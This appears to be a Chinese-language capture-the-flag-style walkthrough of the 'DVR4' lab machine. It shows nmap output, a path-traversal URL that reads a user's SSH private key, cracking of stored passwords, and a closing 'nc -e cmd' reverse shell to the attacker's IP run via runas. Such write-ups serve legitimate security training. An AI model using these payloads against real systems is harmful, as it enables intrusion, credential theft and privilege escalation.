DVR4 pg walkthrough Intermediate window

nmap

┌──(root㉿kali)-[~/lab]
└─# nmap -p- -A -sS 192.168.219.179
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-15 04:22 UTC
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 34.76% done; ETC: 04:23 (0:00:41 remaining)
Stats: 0:05:25 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 91.67% done; ETC: 04:28 (0:00:06 remaining)
Stats: 0:06:24 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 91.67% done; ETC: 04:29 (0:00:11 remaining)
Stats: 0:07:11 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 04:29 (0:00:00 remaining)
Nmap scan report for 192.168.219.179
Host is up (0.071s latency).
Not shown: 65523 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           Bitvise WinSSHD 8.48 (FlowSsh 8.48; protocol 2.0; non-commercial use)
| ssh-hostkey:
|   3072 21:25:f0:53:b4:99:0f:34:de:2d:ca:bc:5d:fe:20:ce (RSA)
|_  384 e7:96:f3:6a:d8:92:07:5a:bf:37:06:86:0a:31:73:19 (ECDSA)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
7680/tcp  open  tcpwrapped
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/15%OT=22%CT=1%CU=34975%PV=Y%DS=4%DC=T%G=Y%TM=675
OS:E5B59%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10D%TI=I%CI=I%TS=U)SEQ(S
OS:P=FE%GCD=2%ISR=10D%TI=I%CI=I%TS=U)OPS(O1=M578NW8NNS%O2=M578NW8NNS%O3=M57
OS:8NW8%O4=M578NW8NNS%O5=M578NW8NNS%O6=M578NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%
OS:W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M578NW8NNS%CC=N%Q=)T1
OS:(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(
OS:R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)

Network Distance: 4 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-12-15T04:29:51
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

TRACEROUTE (using port 587/tcp)
HOP RTT      ADDRESS
1   69.49 ms 192.168.45.1
2   69.47 ms 192.168.45.254
3   70.57 ms 192.168.251.1
4   71.20 ms 192.168.219.179

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 459.68 seconds

访问8080端口



更具cms名字搜索exp

发现存在任意读取漏洞

https://www.exploit-db.com/exploits/45296

但是我们要怎么利用呢

同时我们还看到两个用户

联想的他的ssh是开放的

那我们是不是可以直接读取他的ssh秘钥呢

试试看吧

http://192.168.219.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers\viewer\.ssh\id_rsa&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=

读取成功



ssh登录成功



好了遇到了提权环节了

我们又找到一个 关于提权的exp

https://www.exploit-db.com/exploits/45312



他的描述 是要替换该文件gsm_codec.dll

我们看看我们有没有写入权限吧



好像不太行

那怎么办呢

我们还找到一个exp

https://www.exploit-db.com/exploits/50130

这个exp是用来破解密码的

更具exp的描述我们定位一下加密密码的位置

发现了两个密码

我们将密码写入脚本 尝试破解密码



14WatchD0g? 最后那个问号是特殊字符 我们需要去猜 应为作者没写完善

ImWatchingY0u

有了密码我们能干啥呢

尝试runas 命令

经过不断地尝试发现密码是14WatchD0g$

直接反弹shell

runas /user:administrator "nc -e cmd 192.168.45.250 8080"

提权成功